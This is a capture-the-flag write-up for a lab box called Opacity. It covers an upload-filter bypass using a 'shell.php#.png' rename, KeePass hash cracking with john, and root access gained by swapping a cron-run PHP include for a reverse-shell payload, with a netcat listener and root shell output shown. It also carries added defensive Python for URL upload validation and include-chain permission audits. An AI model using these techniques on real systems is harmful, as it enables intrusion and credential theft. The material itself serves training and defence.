Opacity
File upload Bypass - KeePass Cracking - CronJob PrivEsc
Port Scanning
Starting off with the nmap scan
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0fee2910d98e8c53e64de3670c6ebee3 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCa4rFv9bD2hlJ8EgxU6clOj6v7GMUIjfAr7fzckrKGPnvxQA3ikvRKouMMUiYThvvfM7gOORL5sicN3qHS8cmRsLFjQVGyNL6/nb+MyfUJlUYk4WGJYXekoP5CLhwGqH/yKDXzdm1g8LR6afYw8fSehE7FM9AvXMXqvj+/WoC209pWu/s5uy31nBDYYfRP8VG3YEJqMTBgYQIk1RD+Q6qZya1RQDnQx6qLy1jkbrgRU9mnfhizLVsqZyXuoEYdnpGn9ogXi5A0McDmJF3hh0p01+KF2/+GbKjJrGNylgYtU1/W+WAoFSPE41VF7NSXbDRba0WIH5RmS0MDDFTy9tbKB33sG9Ct6bHbpZCFnxBi3toM3oBKYVDfbpbDJr9/zEI1R9ToU7t+RH6V0zrljb/cONTQCANYxESHWVD+zH/yZGO4RwDCou/ytSYCrnjZ6jHjJ9TWVkRpVjR7VAV8BnsS6egCYBOJqybxW2moY86PJLBVkd6r7x4nm19yX4AQPm8=
| 256 9542cdfc712799392d0049ad1be4cf0e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAqe7rEbmvlsedJwYaZCIdligUJewXWs8mOjEKjVrrY/28XqW/RMZ12+4wJRL3mTaVJ/ftI6Tu9uMbgHs21itQQ=
| 256 edfe9c94ca9c086ff25ca6cf4d3c8e5b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINQSFcnxA8EchrkX6O0RPMOjIUZyyyQT9fM4z4DdCZyA
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-title: Login
|_Requested resource was login.php
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
139/tcp open netbios-ssn syn-ack Samba smbd 4.6.2
445/tcp open netbios-ssn syn-ack Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: -1s
| nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
| OPACITY<00> Flags: <unique><active>
| OPACITY<03> Flags: <unique><active>
| OPACITY<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 0000000000000000000000000000000000
| 0000000000000000000000000000000000
|_ 0000000000000000000000000000
| smb2-time:
| date: 2023-06-06T07:00:33
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 29246/tcp): CLEAN (Couldn't connect)
| Check 2 (port 6171/tcp): CLEAN (Couldn't connect)
| Check 3 (port 20231/udp): CLEAN (Failed to receive data)
| Check 4 (port 32869/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
Let's make some mental notes :)
SSH isn't vulnerable
SMB ports are interesting
HTTP enumeration is required, most likely to get the initial foothold
SMB Enumeration
$ smbclient -L \\\\10.10.157.10\\
Password for [WORKGROUP\cash]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (opacity server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
$ crackmapexec smb 10.10.157.10 -u 'anonymous' -p 'anonymous' --shares
SMB 10.10.157.10 445 OPACITY [*] Windows 6.1 Build 0 (name:OPACITY) (domain:) (signing:False) (SMBv1:False)
SMB 10.10.157.10 445 OPACITY [+] \anonymous:anonymous
SMB 10.10.157.10 445 OPACITY [+] Enumerated shares
SMB 10.10.157.10 445 OPACITY Share Permissions Remark
SMB 10.10.157.10 445 OPACITY ----- ----------- ------
SMB 10.10.157.10 445 OPACITY print$ Printer Drivers
SMB 10.10.157.10 445 OPACITY IPC$ IPC Service (opacity server (Samba, Ubuntu))
$ impacket-lookupsid 'opacity.thm/anonymous@10.10.157.10' -no-pass | tee users.txt
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.157.10
[*] StringBinding ncacn_np:10.10.157.10[\pipe\lsarpc]
[-] nca_s_op_rng_error
$ smbmap -H 10.10.157.10
[+] IP: 10.10.157.10:445 Name: opacity.thm
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (opacity server (Samba, Ubuntu))
Therefore, SMB is of no use to us!
HTTP Enumeration
On visiting the webpage, it redirects us to the login page, login.php

Let's look for some hidden directories
[12:39:41] 403 - 276B - /.ht_wsr.txt
[12:39:41] 403 - 276B - /.htaccess.bak1
[12:39:41] 403 - 276B - /.htaccess.orig
[12:39:41] 403 - 276B - /.htaccess.sample
[12:39:41] 403 - 276B - /.htaccess.save
[12:41:04] 301 - 310B - /cloud -> http://opacity.thm/cloud/
[12:41:04] 200 - 639B - /cloud/
[12:41:13] 301 - 308B - /css -> http://opacity.thm/css/
[12:41:54] 200 - 848B - /login.php
[12:42:38] 403 - 276B - /server-status
[12:42:38] 403 - 276B - /server-status/
The /cloud directory looks interesting, so let's visit that endpoint

We can see that it's a file-upload page which takes a URL as input and fetches the image from it
We can quickly set up a Python HTTP server and host a JPEG file to confirm how the application behaves - it returns 200 OK
If we try to upload a .php file, it gets denied :(
So the backend validates the extension; in order to bypass this we can rename shell.php to shell.php#.png
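Why the `#.png` rename works, and what a fixed check looks like, as an added example that is not code from the challenge or the write-up. It assumes the original backend only looked at the tail of the submitted URL string; the function names are hypothetical. A URL fragment is never sent to the remote server, so the bytes actually fetched come from `shell.php` while a string-suffix check still sees `.png`. The hardened version decides on the extension of the URL *path* (fragment and query ignored), confirms the fetched body carries matching magic bytes, and never reuses a user-controlled name on disk.

```python
"""Added example: naive vs hardened validation for a fetch-by-URL image upload.
Not the challenge's code; helper names are hypothetical."""
import os
import posixpath
import secrets
from typing import Optional
from urllib.parse import urlsplit

# Allowed extensions mapped to the magic bytes the fetched body must start with.
ALLOWED_IMAGE_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def weak_accepts(url: str) -> bool:
    """Naive check (assumed to match the original backend): does the raw URL
    string end in an image extension? 'shell.php#.png' passes, although the
    fragment '#.png' is never transmitted and shell.php is what gets fetched."""
    return url.lower().endswith(tuple(ALLOWED_IMAGE_TYPES))


def validated_extension(url: str) -> Optional[str]:
    """Return the allow-listed extension of the URL *path*, ignoring query and
    fragment, or None when the path does not carry an allowed extension."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return None
    ext = os.path.splitext(posixpath.basename(parts.path))[1].lower()
    return ext if ext in ALLOWED_IMAGE_TYPES else None


def hardened_accepts(url: str, body: bytes) -> bool:
    """Accept only when the path extension is allow-listed AND the fetched body
    starts with the magic bytes for that type."""
    ext = validated_extension(url)
    if ext is None:
        return False
    return body.startswith(ALLOWED_IMAGE_TYPES[ext])


def storage_name(url: str) -> Optional[str]:
    """Server-generated filename: random stem plus the validated extension, so
    nothing from the user-controlled URL reaches the on-disk name."""
    ext = validated_extension(url)
    return None if ext is None else secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed sample inputs: a minimal PNG-looking body and a harmless PHP body.
    png_body = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    php_body = b"<?php echo 'hello'; ?>"
    bypass_url = "http://attacker.example/shell.php#.png"
    print("weak check on bypass URL:", weak_accepts(bypass_url))
    print("hardened check on bypass URL:", hardened_accepts(bypass_url, php_body))
    print("hardened check on a real PNG:", hardened_accepts("http://img.example/cat.png", png_body))
    print("stored as:", storage_name("http://img.example/cat.png"))
```

The magic-byte check is the part that actually closes the hole: even a URL path ending in `.png` is rejected when the fetched content is PHP, and the file is stored under a name the client never chose.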


Looking at www-data's home directory, we can find some creds in the login.php source code

Let's log in to the website with the credentials we got; we can even try password spraying on the users sysadmin and root, but nothing worked ;(

Lateral Move => Sysadmin
Since we got to a dead end I started looking around, and I found dataset.kdbx in the /opt folder - transferred it to our machine and analyzed it using the file command
It seems to be a KeePass database file, which we can try to crack with john
$ keepass2john dataset.kdbx > keepasshash.txt
$ john keepasshash.txt --wordlist=/opt/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 100000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963 (dataset)
1g 0:00:00:09 DONE (2023-06-06 13:26) 0.1015g/s 89.34p/s 89.34c/s 89.34C/s chichi..david1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
We can use the KeePass2 GUI functionality to open the database file

We can now SSH into the box as sysadmin :)
Privilege Escalation => Root
Now that we have a stable user shell we can cat local.txt
Let's start enumerating from here, the scripts directory looks interesting!
sysadmin@opacity:~$ cd scripts/
sysadmin@opacity:~/scripts$ ls
lib script.php
sysadmin@opacity:~/scripts$
sysadmin@opacity:~/scripts$ cat script.php
<?php
//Backup of scripts sysadmin folder
require_once('lib/backup.inc.php');
zipData('/home/sysadmin/scripts', '/var/backups/backup.zip');
echo 'Successful', PHP_EOL;
//Files scheduled removal
$dir = "/var/www/html/cloud/images";
if(file_exists($dir)){
    $di = new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS);
    $ri = new RecursiveIteratorIterator($di, RecursiveIteratorIterator::CHILD_FIRST);
    foreach ( $ri as $file ) {
        $file->isDir() ? rmdir($file) : unlink($file);
    }
}
?>
So script.php requires another file called backup.inc.php, which lives in the lib directory
sysadmin@opacity:~/scripts/lib$ ls -lahs
total 132K
4.0K drwxr-xr-x 2 sysadmin root 4.0K Jul 26 2022 .
4.0K drwxr-xr-x 3 root root 4.0K Jul 8 2022 ..
12K -rw-r--r-- 1 root root 9.3K Jul 26 2022 application.php
4.0K -rw-r--r-- 1 root root 967 Jul 6 2022 backup.inc.php
24K -rw-r--r-- 1 root root 24K Jul 26 2022 bio2rdfapi.php
12K -rw-r--r-- 1 root root 11K Jul 26 2022 biopax2bio2rdf.php
8.0K -rw-r--r-- 1 root root 7.5K Jul 26 2022 dataresource.php
8.0K -rw-r--r-- 1 root root 4.8K Jul 26 2022 dataset.php
4.0K -rw-r--r-- 1 root root 3.2K Jul 26 2022 fileapi.php
4.0K -rw-r--r-- 1 root root 1.3K Jul 26 2022 owlapi.php
4.0K -rw-r--r-- 1 root root 1.5K Jul 26 2022 phplib.php
12K -rw-r--r-- 1 root root 11K Jul 26 2022 rdfapi.php
20K -rw-r--r-- 1 root root 17K Jul 26 2022 registry.php
8.0K -rw-r--r-- 1 root root 6.8K Jul 26 2022 utils.php
4.0K -rwxr-xr-x 1 root root 3.9K Jul 26 2022 xmlapi.php
All the files here are owned by root, so let's try copying the backup file from the lib directory to our home directory so that we can edit it
sysadmin@opacity:~/scripts/lib$ cp backup.inc.php ../
cp: cannot create regular file '../backup.inc.php': Permission denied
sysadmin@opacity:~/scripts/lib$ cp backup.inc.php ../../
sysadmin@opacity:~/scripts/lib$ cd ..
sysadmin@opacity:~/scripts$ ls
lib script.php
sysadmin@opacity:~/scripts$ cd ..
sysadmin@opacity:~$ ls
backup.inc.php local.txt scripts
We'll now remove the original backup.inc.php from the lib directory (the lib directory itself is owned by sysadmin, so we are allowed to unlink the root-owned file inside it), insert our PHP reverse-shell payload into our copy, put it back where the original was, and wait for the cron job to execute it
$ rlwrap nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.8.74.51] from (UNKNOWN) [10.10.157.10] 43978
Linux opacity 5.4.0-139-generic #156-Ubuntu SMP Fri Jan 20 17:27:18 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
08:10:02 up 1:12, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
sysadmin pts/1 10.8.74.51 08:00 10.00s 0.12s 0.12s -bash
uid=0(root) gid=0(root) groups=0(root)
sh: 0: can't access tty; job control turned off
# whoami
root
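The root cause above is not the file's permissions but its parent directory's: backup.inc.php was root-owned and read-only, yet `scripts/lib` belonged to sysadmin, so any entry inside it could be unlinked and re-created with new content for root's cron job to load. The following audit script is an added example, not part of the write-up or the box; it walks every path component leading to a file that a privileged job requires and flags components a non-root user could modify or replace. The function names are hypothetical, and `demo_scenario` builds a constructed temp-directory layout mirroring the one on the box (the demo trusts the current uid as a stand-in for root, since a demo cannot chown).

```python
"""Added example: audit the include chain of a root-run PHP script for
directories or files that an untrusted user could replace. Not the box's code."""
import os
import re
import stat
import tempfile
from pathlib import Path
from typing import Dict, List, Set

INCLUDE_RE = re.compile(r"(?:require|include)(?:_once)?\s*\(?\s*['\"]([^'\"]+)['\"]")


def untrusted_components(path: str, trusted_uids: Set[int] = frozenset({0})) -> List[str]:
    """Walk from the filesystem root down to `path` and return every component
    that an untrusted user could modify or replace: owned by a uid outside
    `trusted_uids`, or writable by group/other. A writable directory counts as
    much as a writable file, because its owner can unlink and re-create any
    entry in it regardless of that entry's own owner or mode."""
    findings = []
    p = Path(path).resolve()
    for component in list(reversed(p.parents)) + [p]:  # root first, file last
        st = os.lstat(component)
        owned_by_untrusted = st.st_uid not in trusted_uids
        writable_by_others = bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))
        if owned_by_untrusted or writable_by_others:
            findings.append(str(component))
    return findings


def includes_of(php_file: str) -> List[str]:
    """Small extractor for require/include targets in a PHP file, resolved
    relative to the file's own directory (enough for a script like script.php)."""
    base = Path(php_file).resolve().parent
    text = Path(php_file).read_text(errors="replace")
    return [str((base / m).resolve()) for m in INCLUDE_RE.findall(text)]


def demo_scenario() -> Dict[str, object]:
    """Constructed layout mirroring /home/sysadmin/scripts: script.php requires
    lib/backup.inc.php; the include is read-only but lib/ is made writable by
    others, which is the condition the audit must catch."""
    root = Path(tempfile.mkdtemp(prefix="opacity-demo-"))
    lib = root / "lib"
    lib.mkdir(mode=0o755)
    inc = lib / "backup.inc.php"
    inc.write_text("<?php function zipData($src, $dst) {} ?>\n")
    inc.chmod(0o644)
    script = root / "script.php"
    script.write_text("<?php\nrequire_once('lib/backup.inc.php');\n")
    trusted = {0, os.getuid()}  # demo cannot chown, so treat ourselves as root
    before = untrusted_components(str(inc), trusted)
    lib.chmod(0o777)            # simulate a directory another user can write
    after = untrusted_components(str(inc), trusted)
    return {
        "includes": includes_of(str(script)),
        "lib": str(lib.resolve()),
        "inc": str(inc.resolve()),
        "before": before,
        "after": after,
    }


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        target = sys.argv[1]
        for f in [target] + includes_of(target):
            for bad in untrusted_components(f):
                print(f"{f}: replaceable via {bad}")
    else:
        r = demo_scenario()
        print("flagged before chmod:", [x for x in r["before"] if x == r["lib"]])
        print("flagged after chmod: ", [x for x in r["after"] if x == r["lib"]])
```

Run it with the path of a cron-executed script to list every include and the component that makes it replaceable; on the box it would report `/home/sysadmin/scripts/lib` for backup.inc.php, and the fix is to have root own the whole chain (`chown -R root:root`, no group/other write) or move the job's code out of a user's home.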